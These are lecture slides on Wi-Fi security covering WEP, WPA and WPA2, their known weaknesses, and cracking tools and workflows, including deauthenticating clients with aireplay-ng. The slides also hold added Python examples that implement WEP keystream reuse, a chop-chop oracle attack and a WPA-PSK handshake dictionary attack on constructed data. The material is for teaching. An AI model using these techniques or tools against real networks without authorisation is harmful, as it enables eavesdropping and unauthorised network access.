Security of Information Systems: Wi-Fi Security. Dr. Igor Santos
Contents • Introduction to Wi-Fi networks • Encryption • WEP • WPA • Vulnerabilities • Attacks • Setting up a secure Wi-Fi network • Captive Portals
Introduction to Wi-Fi networks • What is a Wi-Fi network? • A set of computers interconnected through a wireless "bridge / router", the Access Point • Main devices in a Wi-Fi network • Network cards • Access Points (AP) • Antennas
Introduction to Wi-Fi networks • Typical topology (diagram on the original slide)
Wi-Fi network cards • Modes • Ad-hoc: direct interconnection between devices without an AP • Similar to a point-to-point connection over a crossover Ethernet cable (but several PCs can join an ad-hoc network) • No AP manages the medium → more collisions → lower performance
Wi-Fi network cards • Managed or Infrastructure: the card is connected to an AP that manages the connections (STA <> AP) • The card leaves all traffic management to the AP • Sometimes the ESSID (network name) of the AP must be known in order to join → detect it by entering monitor mode
Wi-Fi network cards • Master: the card acts as an AP, providing service and managing the connections (AP <> STA) • A PC can be turned into an AP • HostAP: http://hostap.epitest.fi • Advantages • A PC is far more powerful than a consumer AP, many possibilities (filtering, security enhancements, routing, DHCP, ...) • Recycling of obsolete equipment: cheap APs • Shortcomings • Not all cards can work in Master mode (chipsets such as Prism / Hermes / Atheros can)
Wi-Fi network cards • Monitor: allows capturing packets without associating with an AP or an ad-hoc network • Monitors a specific channel without transmitting anything (passive) • The card does not check the frame CRCs (frames with a bad FCS are delivered too) • It is NOT THE SAME as promiscuous mode • Promiscuous: on wired LANs, while connected to the network • Monitor: on Wi-Fi networks, without being connected • Not all cards support monitor mode • http://kmuto.jp/debian/hcl/index.cgi • http://linux-wless.passys.nl
Wi-Fi Access Points • Interconnect Ethernet LANs with wireless users or networks • Alternatives • Commercial APs • Commercial APs with free software • Install custom firmware on a commercial AP • "Homemade" APs • Obsolete PC + Wi-Fi card in Master mode
Wi-Fi Access Points • Functionalities • They manage the physical medium • They selectively retransmit data • They may offer additional services • DHCP • Remote management (web, telnet, ssh) • Filtering by IP, MAC, etc.
Wi-Fi Access Points • Concepts • BSSID (Basic Service Set Identifier) • Unique address that identifies the AP creating the wireless network • It is the MAC address of the AP's radio • ESSID (Extended Service Set Identifier) • Name of up to 32 characters that identifies the wireless network • Meant to be unique, but any AP can announce any ESSID (the basis of rogue APs)
Wi-Fi Access Points • Channel • 802.11b/g Wi-Fi works in the 2.4 GHz band • The band is divided into channels 5 MHz apart, each 22 MHz wide (13 channels in Europe, 11 in the US, 14 in Japan) • Each channel is a different frequency range within the band • Adjacent channels overlap → interference! • Recommendation • Use channels 1, 6 and 11, which do not overlap each other
Wi-Fi antennas • They increase the coverage and performance of a wireless node • Several scenarios • AP inside a building • Outdoor APs • Point-to-point link • Point-to-multipoint • Hot-spot
Wi-Fi antennas • There are different types of antennas • Omnidirectional • Radiate in all directions • Ideal for APs or hot-spots • Directional • Radiate towards one direction or a narrow sector • Ideal for: • Clients of an AP • LAN-to-LAN interconnection
Wi-Fi antennas • Homemade antennas (photos on the original slide)
WEP Encryption • WEP (Wired Equivalent Privacy) • Included in the 802.11 standard • Protection based on the RC4 stream cipher • Uses keys of 64, 128 or 256 bits (actually 40, 104 or 232 bits of secret key, because a 24-bit Initialization Vector (IV), sent in clear and changed on every packet, is prepended to the key) • Integrity: a CRC-32 (the ICV) is appended to the plaintext before encryption • The key may be generated from a passphrase or entered directly by the user • The key must be known to all clients (shared secret)
WPA Encryption • WPA (Wi-Fi Protected Access) • Interim solution prior to 802.11i (WPA2), designed to run on existing WEP hardware • Improvements over WEP • Dynamic, per-packet keys with limited lifetime (TKIP - Temporal Key Integrity Protocol) • Longer Initialization Vector: 48 bits, minimizing keystream reuse • Integrity: from ICV (Integrity Check Value, a plain CRC) to MIC (Michael), keyed with a secret derived from the session key
WPA Encryption • Two modes • WPA-Personal (PSK) • Intended for simple environments • Pre-Shared Key (PSK): one shared secret for the whole network • WPA-Enterprise (RADIUS) • Intended for complex environments • Every user has his/her own login/password • 802.1X • Supplicant (STA) • Authenticator (AP) • Authentication server (RADIUS)
802.11i (WPA2) Encryption • WPA2 • Approved by the IEEE and adopted by the Wi-Fi Alliance in 2004 • Also known as 802.11i or RSN (Robust Security Network) • Improvements • 802.1X-based authentication • AES-based encryption (CCMP) • Dynamic key management (pairwise and group key handshakes) • Support for ad-hoc networks
Wi-Fi vulnerabilities
Wi-Fi vulnerabilities • Wi-Fi networks have the same problems / bugs / vulnerabilities as wired networks • In addition, they have problems tied to the radio medium • Radio scanners: anyone within range can listen • Radio jamming (DoS) • Flexibility vs. security ...
Wi-Fi vulnerabilities • Vulnerabilities • Access: wardriving • WEP encryption: attacks such as FMS, KoreK, etc. • WPA and WPA2 encryption: dictionary attacks against the PSK • Man-in-the-Middle attacks • Rogue APs • Vulnerabilities in APs working in "bridge" mode: ARP poisoning • Denial of Service (DoS)
WEP vulnerabilities • Walker (Intel) (2000) • "WEP is not a good way to provide privacy for wireless communications" • Using a stream cipher (RC4) in an environment in which keystreams get repeated is a mistake • Main problem → Initialization Vectors: only 24 bits, so they repeat quickly on a busy network • If IVs repeat and a lot of plaintext is known, breaking the encryption is easy: XORing two ciphertexts with the same IV cancels the keystream and leaves the XOR of the two plaintexts
WEP vulnerabilities • Borisov et al. (2001) • Decryption-dictionary attack (the keystream for an IV is derivable by a known-plaintext attack; a table of keystreams indexed by IV decrypts all traffic) • Arbaugh (2001) • "Inductive Chosen Plaintext" attack (builds a database with all the keystreams for a WEP key in a relatively short time) • Fluhrer, Mantin, Shamir (2001) • "Weaknesses in the Key Scheduling Algorithm of RC4" (for certain weak IVs, a few key bytes determine the first keystream byte with high probability, so the key can be recovered byte by byte)
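Added worked example, not part of the original slides: a minimal WEP implementation in Python that shows the encryption structure from the WEP slide (IV prepended to the key, RC4, CRC-32 ICV) and the keystream-reuse flaw described by Walker and Borisov et al. above. The key, IV, ARP payload and "secret" frame are constructed for the demonstration; the 1-byte Key ID field that follows the IV in a real frame is omitted. The ICV check in `wep_decrypt` is also what lets a single captured frame validate a guessed or default key.

```python
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """First n keystream bytes of RC4 for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                        # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the payload, 4 bytes little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (in clear) || RC4(IV || root_key) XOR (plaintext || ICV).
    The 1-byte Key ID field that follows the IV in a real frame is omitted."""
    assert len(iv) == 3 and len(root_key) in (5, 13), "WEP-40 / WEP-104 only"
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + root_key, len(body)))


def wep_decrypt(root_key: bytes, frame: bytes):
    """Return the payload, or None when the ICV does not verify (wrong key or tampering)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + root_key, len(ct)))
    data, tag = body[:-4], body[-4:]
    return data if icv(data) == tag else None


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """Known-plaintext attack: keystream of this frame's IV = ciphertext XOR (plaintext || ICV)."""
    return xor(frame[3:], known + icv(known))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reuses the same IV, without the key. Strips the ICV."""
    return xor(frame[3:], keystream)[:-4]


# Constructed sample data (not from a real capture). The WEP-40 root key is what the
# attacker does not know; an ARP request is the classic known plaintext.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("a1b2c3")
ARP = bytes.fromhex("aaaa030000000806"           # LLC/SNAP header for ARP
                    "0001080006040001"           # Ethernet / IPv4, request
                    "001122334455" "0a000001"    # sender MAC / IP
                    "000000000000" "0a000002")   # target MAC / IP
SECRET = b"PASS=hunter2 FROM 10.0.0.1"

FRAME_ARP = wep_encrypt(KEY, IV, ARP)
FRAME_SECRET = wep_encrypt(KEY, IV, SECRET)     # same IV -> identical keystream


def demo():
    """Keystream reuse, then single-frame key validation, as on the slides."""
    ks = keystream_from_known_plaintext(FRAME_ARP, ARP)
    recovered = decrypt_with_keystream(FRAME_SECRET, ks)          # no key involved
    candidates = [b"\x00" * 5, b"admin", KEY]                    # e.g. a default-key list
    hit = next((c for c in candidates if wep_decrypt(c, FRAME_SECRET) is not None), None)
    return recovered, hit


if __name__ == "__main__":
    recovered, hit = demo()
    print("recovered without the key:", recovered)
    print("key confirmed by the ICV:", hit.hex())
```

The second half of `demo` is the whole reason "only one encrypted packet capture is needed" for dictionary or default-key attacks: a wrong key yields a random ICV mismatch, the right one verifies, so no traffic volume is required at all.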
WEP vulnerabilities • KoreK (2004) • "KoreK attacks": a set of enhancements to the FMS attack (Fluhrer, Mantin, Shamir, 2001) • Only about 200,000 Initialization Vectors are needed • "Chop-chop" attack: a reverse of Arbaugh's inductive attack (2001) • It sends the AP an encrypted frame truncated by one byte, with a correction XORed into its last four bytes that depends on a guess of the chopped plaintext byte • The AP relays only the frames whose ICV (CRC) verifies • After at most 256 attempts the guess is confirmed, yielding one plaintext byte and one keystream byte per iteration • Requests can be sent in parallel (faster) • Gradually the whole keystream can be derived, without ever learning the key
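Added example, not from the lecture: a simulation of the chop-chop oracle described on the slide above, in Python. The AP is modelled as an object that decrypts with the keystream of this IV and answers only whether the ICV verified; the attacker never sees that keystream. The plaintext and keystream are constructed (RC4 is not needed here, since chop-chop exploits only the linearity of the CRC-32 ICV and the AP's accept/reject behaviour). The correction mask for each guess is derived from the standard CRC-32 lookup table.

```python
import random
import zlib


def make_crc_table():
    """Standard reflected CRC-32 table (polynomial 0xEDB88320), the CRC WEP uses for the ICV."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = make_crc_table()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    return zlib.crc32(data).to_bytes(4, "little")


class AccessPointOracle:
    """The AP as chop-chop sees it: it decrypts with the keystream of this IV and relays
    only frames whose ICV verifies. Accept/reject is all the attacker learns."""

    def __init__(self, keystream: bytes):
        self._keystream = keystream      # secret: the AP derives it from the WEP key
        self.queries = 0

    def accepts(self, frame: bytes) -> bool:
        self.queries += 1
        body = xor(frame, self._keystream)
        return len(body) >= 4 and icv(body[:-4]) == body[-4:]


def correction(k: int) -> int:
    """Mask to XOR into the last 4 bytes of the chopped frame so that its ICV is valid
    again, if the chopped byte corresponds to CRC table index k. Follows from the
    table-driven CRC update, where one step mixes only table[k] into the register."""
    return (k ^ 0xFF) | ((CRC_TABLE[k] & 0x00FFFFFF) << 8)


def chop_chop(frame: bytes, oracle: AccessPointOracle, nbytes: int):
    """Recover the last `nbytes` keystream and plaintext bytes, one byte per round,
    with at most 256 oracle queries per round and no knowledge of the key."""
    assert 0 < nbytes <= len(frame) - 4
    cur = frame
    ks = {}
    while len(ks) < nbytes:
        pos = len(cur) - 1
        chopped = cur[:-1]
        tail = int.from_bytes(chopped[-4:], "little")
        for k in range(256):
            cand = chopped[:-4] + (tail ^ correction(k)).to_bytes(4, "little")
            if oracle.accepts(cand):
                plain = ((CRC_TABLE[k] >> 24) ^ 0xFF) & 0xFF   # the chopped plaintext byte
                ks[pos] = cur[-1] ^ plain                      # keystream byte at `pos`
                cur = cand                                     # shorter, still valid frame
                break
        else:
            raise RuntimeError("no correction accepted: not a valid WEP frame?")
    positions = sorted(ks)
    return (bytes(ks[p] for p in positions),
            bytes(frame[p] ^ ks[p] for p in positions))


# Constructed sample: LLC/SNAP + ARP header as plaintext; the keystream is random bytes
# from a seeded generator, standing in for the RC4 output the attacker never sees.
PLAINTEXT = bytes.fromhex("aaaa0300000008060001080006040001")
_rng = random.Random(2007)
KEYSTREAM = bytes(_rng.getrandbits(8) for _ in range(len(PLAINTEXT) + 4))
FRAME = xor(PLAINTEXT + icv(PLAINTEXT), KEYSTREAM)


def demo(nbytes: int = 8):
    oracle = AccessPointOracle(KEYSTREAM)
    keystream, plaintext = chop_chop(FRAME, oracle, nbytes)
    return keystream, plaintext, oracle.queries


if __name__ == "__main__":
    keystream, plaintext, queries = demo()
    print(f"{queries} queries: keystream tail {keystream.hex()}, plaintext tail {plaintext.hex()}")
```

Each round consumes at most 256 queries, which is why the slide notes that sending them in parallel is what makes the attack fast; the recovered plaintext tail includes the original 4-byte ICV, so the last data bytes start 4 positions from the end.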
WEP vulnerabilities • Re-injection of captured packets to generate new traffic (and therefore new Initialization Vectors) • ARP requests • ICMP traffic • DHCP requests
WEP vulnerabilities • Klein (2005) • Improvements to the RC4 correlations found by FMS and KoreK • Bittau et al. (2006) • Packet fragmentation attack between STA and AP • Ramachandran and Ahmad (2007) • "Caffe-Latte attack" (recovers the key from a client (STA), not from the AP) • Hirte (2007) • Improved "Caffe-Latte attack" (no need for ARP packets)
WEP vulnerabilities • Tews, Weinmann, Pyshkin (2007) • "Breaking 104-bit WEP in less than 60 seconds" (improved KoreK's approach using Klein's contribution) • Performance • 50% success with 40,000 Initialization Vectors • 95% success with 85,000 Initialization Vectors • Beck and Tews (2008) • Improvements on the approach of Tews, Weinmann and Pyshkin (reduce the number of packets needed from 40,000-90,000 to about 24,000)
WEP attacks • WEP cracking • Capture traffic that contains Initialization Vectors (data frames, NOT beacon frames) • If no user is connected to the AP, no traffic is generated: use a fake association • If there is little traffic: re-inject (e.g. ARP replay) • Use one of the methods (KoreK, PTW, ...) to obtain the key
WEP attacks • Brute force • For WEP-40 it is feasible • 2^40 keys • On a Core 2 Duo: 42 days (300,000 keys/s) • On a cluster of FPGAs: 13 minutes (1.386 G keys/s) • For WEP-104 IT IS NOT • 2^104 ≈ 2 x 10^31 keys • On a Core 2 Duo: about 2 x 10^18 years • On a cluster of FPGAs: about 5 x 10^14 years • Dictionary attacks • Keys already broken on other APs • Default keys
WEP attacks • Many manufacturers ship default WEP keys • ESSID recognizable as WLAN_XX or equivalent • The default WEP key is predictable, generated from: • A common prefix per manufacturer • The BSSID • The XX of WLAN_XX • Other unknown data • The remaining unknown part can be brute-forced: 16,384 possibilities • WlanDecrypter generates these candidate keys from the BSSID and ESSID • A single captured encrypted packet is enough to test them (the ICV only verifies for the right key) • WlanInject generates a fake association if there is no traffic
Tools for cracking WEP • GNU/Linux tools • aircrack, aircrack-ng • Continuous development • Highly recommended • WepLab • Focused on WEP, few updates • GUI (wxWepLab) • Assistants • Airoscript • wesside-ng and easside-ng • spoonwep2
Tools for cracking WEP • Tools for Microsoft Windows • Proprietary software • CommView for WiFi (TamoSoft) • OmniPeek (WildPackets) • AirMagnet WiFi Analyzer (AirMagnet)
Tools for cracking WEP • Ports of free software (partial functionality) • airsnort: obsolete • WepLab • Does not support capturing on Windows • Requires Wireshark or another capture program • aircrack and aircrack-ng • Currently widely used • Capture and re-injection with some drivers
WEP conclusions • A few years ago WEP was said to be bad, but better than nothing • Today it is almost the opposite: • Protecting a network with WEP invites attacks, because it is a challenge easily within reach of casual crackers • Better security protocols exist (WPA, WPA2), so WEP should ALWAYS be discarded
WPA-PSK vulnerabilities • The exchange WPA uses to derive the session keys (the 4-way handshake) is observable, and in WPA-PSK the pre-shared key is the only secret in it • Pre-shared keys are "unsafe" (WPA-PSK) • Subject to dictionary attacks • No need to capture lots of traffic: capturing only the key exchange is enough
WPA vulnerabilities • Capture the initial handshake • 4 WPA packets (EAPOL-Key messages) from the authentication of a client against an AP • Brute force or dictionary attack to extract the key: each candidate passphrase is expanded into a PMK (PBKDF2, salted with the ESSID), from which the handshake's MIC is recomputed and compared with the captured one • Success depends on the dictionary • It is also possible to use rainbow tables (PMKs precomputed per ESSID)
WPA attacks • Many manufacturers ship default WPA keys derivable from public data • Recognizable ESSIDs • WLAN_XXXX • JAZZTEL_XXXX • The BSSID is also needed • Online tools • http://www.seguridadwireless.net/wpamagickey1.php • http://www.seguridadwireless.net/wpamagickey.php
Tools for cracking WPA-PSK • CoWPAtty • Since its fourth version it also cracks WPA2 • There are "rainbow tables" of the most common passphrases (English) for common ESSIDs (linksys, tsunami, comcomcom, etc.) • wpa_crack • Proof of concept • SpoonWpa • GUI assistant • wpacracker.com • WPA cracking using cloud computing (17 US$)
WPA cracking workflow • WLAN_XXXX / JAZZTEL_XXXX? • http://www.seguridadwireless.net/wpamagickey1.php • http://www.seguridadwireless.net/wpamagickey.php • Test the default passphrase "12345670" • WPA-PSK? • Obtain the ESSID • Obtain an authentication (handshake): • De-authenticate a connected client so it reconnects: aireplay-ng -0 • Pre-computed tables for that ESSID • Crack: aircrack-ng, cowpatty
WPA cracking workflow • Without tables for that ESSID • Generate them: genpmk (in parallel if possible) • Then back to the WPA-PSK crack step with the new tables
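Added example (not from the slides): the key derivation behind the handshake capture on the WPA vulnerabilities slide and the cracking workflow above, in Python. The client side computes the MIC on EAPOL-Key message 2 with the real passphrase; the attacker side recomputes it for every dictionary word, both directly and with a genpmk-style precomputed PMK table. The SSID, passphrase, MAC addresses, nonces, EAPOL frame bytes and wordlist are all constructed; the PBKDF2 test vector (SSID "IEEE", passphrase "password") is the one published in the 802.11i standard.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 256 bits).
    The expensive step, and it depends on the ESSID: precomputed tables are per-ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the four public handshake values (both MACs, both nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_zero_mic: bytes, wpa2: bool) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for WPA/TKIP,
    HMAC-SHA1 for WPA2/CCMP, truncated to 16 bytes. KCK = first 16 bytes of the PTK."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_zero_mic, digest).digest()[:16]


# Constructed network and handshake values (not from a real capture).
SSID = "Lab-WiFi"
PASSPHRASE = "correct horse battery"     # what the attacker wants
AA = bytes.fromhex("001122334455")      # AP MAC (authenticator address)
SPA = bytes.fromhex("66778899aabb")     # client MAC (supplicant address)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for EAPOL-Key message 2 with its MIC field already zeroed.
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + bytes(16) + SNONCE + bytes(48)
WORDLIST = ["password", "12345670", "letmein", PASSPHRASE, "hunter2"]


def capture_handshake(wpa2: bool = True) -> dict:
    """What the attacker sees on the air: MACs, both nonces, message 2 and its MIC.
    Computed here by the legitimate client, which knows the passphrase."""
    ptk = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2, "mic": eapol_mic(ptk[:16], EAPOL_M2, wpa2), "wpa2": wpa2}


def build_pmk_table(ssid: str, wordlist) -> dict:
    """genpmk-style precomputation: PBKDF2 once per word for this ESSID, reusable for
    every handshake later captured on a network with that name."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack(cap: dict, wordlist, pmk_table: dict = None):
    """Dictionary attack: return the candidate whose recomputed MIC matches the capture."""
    for word in wordlist:
        pmk = pmk_table.get(word) if pmk_table else None
        if pmk is None:
            pmk = pmk_from_passphrase(word, cap["ssid"])
        ptk = ptk_from_pmk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], cap["eapol"], cap["wpa2"]), cap["mic"]):
            return word
    return None


if __name__ == "__main__":
    cap = capture_handshake()
    print("recovered passphrase:", crack(cap, WORDLIST))
    table = build_pmk_table(SSID, WORDLIST)          # pay PBKDF2 once per ESSID
    print("with a PMK table:", crack(cap, WORDLIST, table))
```

The cost asymmetry is the whole point of the workflow: the 4096-iteration PBKDF2 dominates each candidate, while the PTK and MIC are a handful of HMACs. Tables keyed by ESSID (genpmk, cowpatty's rainbow tables) move the PBKDF2 work off the critical path for common network names, and an unusual ESSID defeats every precomputed table, forcing the "generate tables" branch above.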